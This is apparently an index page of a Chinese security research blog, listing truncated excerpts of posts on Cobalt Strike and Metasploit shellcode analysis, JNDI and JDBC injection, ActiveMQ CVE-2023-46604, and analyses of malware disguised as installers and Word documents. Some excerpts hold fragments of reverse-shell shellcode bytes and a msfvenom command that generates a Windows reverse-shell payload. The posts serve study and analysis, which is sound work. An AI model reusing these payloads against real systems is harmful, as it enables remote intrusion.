cobalt strike后门木马shellcode分析
2025-02-10 5k 字 29 分钟

cobalt strike后门木马shellcode分析

其reversetcp的shellcode如下,主要是看和msf的有什么区别 1unsigned char buf[] = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40
JNDI注入绕过高版本限制探究
2025-02-10 2.3k 字 9 分钟

JNDI注入绕过高版本限制探究

限制内容: SQLJDK 6u141、7u131、8u121之后:增加了com.sun.jndi.rmi.object.trustURLCodebase选项,默认为false,禁止RMI和CORBA协议使用远程codebase的选项,因此RMI和CORBA在以上的JDK版本上已经无法触发该漏洞,但依然可以通过指定URI为LDAP协议来进行JNDI注入攻击。JDK 6u211、7u201、8u191之后:增加了com.sun.jndi.ldap.object.trustURLCodebase选项,默认为false,禁止LDAP协议使用远程codebase的选项,把LDAP协议的攻击途径也给
JDBC反序列化漏洞探究
2025-02-08 863 字 3 分钟

JDBC反序列化漏洞探究

什么是JDBC反序列化漏洞? JDBC在连接目标服务时,存在反序列目标服务传回的数据的机制,如果目标服务是恶意,可以精心构造这一部分数据,那么发起JDBC连接的客户端就会受到攻击,所以该部分的攻击点是可以控制连接目标的地址,指向攻击者构造的服务器地址,而不是控制连接数据 这里注意几个概念,JDBC是是Java提供对数据库进行连接抽象API接口,具体的内容是不同的数据库提供商实现的 JDBC反序列机制探究 相关依赖 SQL mysql mysql-connector-java 8.0.19 commons-collections commons-collections 3.2.1 客
一个简单的安卓flutter逆向尝试
2025-02-06 3.3k 字 14 分钟

一个简单的安卓flutter逆向尝试

源自某次CTF,运行效果如下 ​​ ​​ ​​ 一个flutter应用,思考提取flutter应用源码,记得下面这个工具可以 https://github.com/worawit/blutter 该应用是否可以抽取dart源码以及以及是否能直接绕过反逆向技术和原理有待探究 blutter环境配置参考: 首先我们需要从GitHub上克隆blutter项目: 1git clone https://github.com/worawit/blutter.git 然后进入blutter目录执行初始化环境的脚本: 12cd blutter/python scripts/init_env_win.py
MSF的shellcode分析
2025-02-06 2.7k 字 15 分钟

MSF的shellcode分析

基本分析 生成指令: 1msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.1 LPORT=1111 -f c 生成结果: 12345678910111213141516171819202122232425unsigned char buf[] = "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50""\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26""\x31
伪装todesk安装程序病毒分析
2025-02-06 390 字 1 分钟

伪装todesk安装程序病毒分析

该病毒为本地指令远控类病毒,主要用于盗窃WEB3加密货币 ​​ setup factory打包工具 ​​ 尝试安装到目录 ​​ 定位安装目录 ​​ 但是实际上执行的是安装目录下dev目录下的软件 ​​ 恶意逻辑位于crt.dll,根据以往经验可知其中一个文件会是加密的PE文件,推测是Prokectiodn.u6mg,下createfile断点调试,直接运行无效,想起之前快捷方式的目标中有输入参数g5hc的环节,推测需要参数g5hc,格式为空格加在后面 ​​ createfile无法断下,断下createfileW,显示 ​​ 并且是先加载Prgkectiodn.D6DD5,后加载Prgkec
Apache ActiveMQ RCE 漏洞(CVE-2023-46604)分析
2025-02-06 993 字 3 分钟

Apache ActiveMQ RCE 漏洞(CVE-2023-46604)分析

漏洞描述 ActiveMQ中对应消息的传递有着自己的序列化/反序列化逻辑,不过反序列化至对象的过程中不调用通用方法辅助(区别传统反序列化调用readobject) 并且该反序列化不是通用的(即每个类的反序列化过程都不一样) 漏洞点源于org.apache.activemq.openwire.v1.BaseDataStreamMarshaller#createThrowable方法存在可控的任意调用,而这个可控的任意调用可以由ExceptionResponse这个类的序列化操作器ExceptionResponseMarshaller触发,所以只需要传递ExceptionResponse
伪装工业防火墙软件的病毒样本分析
2025-02-06 421 字 1 分钟

伪装工业防火墙软件的病毒样本分析

初始样本伪装成防火墙安装程序,使用的NSIS打包程序,NSIS是一个开源的打包安装项目,该样本对其源码进行了修改,常规的NSIS提取脚本无法提取NSIS安装设置脚本​动态创建一系列文件​​​​​​​​​​​​​​​通过动态函数调用注入代码到windows.storage.dll里创建cmd.exe进程,传入参数为”\“C:\\Windows\\System32\\cmd.exe\“ /c copy Kilometers Kilometers.cmd && Kilometers.cmd”,这里创建进程通过dwCreationFlags 中传入 CREATE_SUSPEN
伪装word文档病毒分析
2025-02-06 1.1k 字 4 分钟

伪装word文档病毒分析

样本伪装部分 初始样本伪装成word文档,但实际上是一个快捷方式 ​​ 有五个文件,但是只显示一个,其他被隐藏了 ​​ 可以在powershell中强制查看文件Get-ChildItem -Force ​​ 要让其显示需要使用Windows + R快捷键打开「运行」对话框,执行control folders命令打开「文件夹选项」取消勾选隐藏受保护的操作系统文件 ​​ 隐藏的文件内容如下 ​​ ink文件分析,这里是command line形式,通过explorer传递参数启动这个程序__MACOS\wps.com ​​ ​​ wps.com分析 实际上正常软件.exe改为.com也能运行,跟e
windows输入事件层次
2025-02-06 765 字 2 分钟

windows输入事件层次

1234567891011[硬件层] ↓[HAL - 硬件中断处理] ↓[HID层: HID Miniport Driver → HID Class Driver] ↓[输入堆栈: Device Driver → Filter Driver → Class Driver] ↓[Windows输入子系统: 内核模式输入管理器 → 用户模式输入管理器] ↓[用户模式: Raw Input / 窗口消息 / DirectInput] 硬件层 (Hardware Layer) 实际的物理设备(如鼠标、键盘)通过S/2、USB 或其他标准协议通过输入信号触发硬件
backtop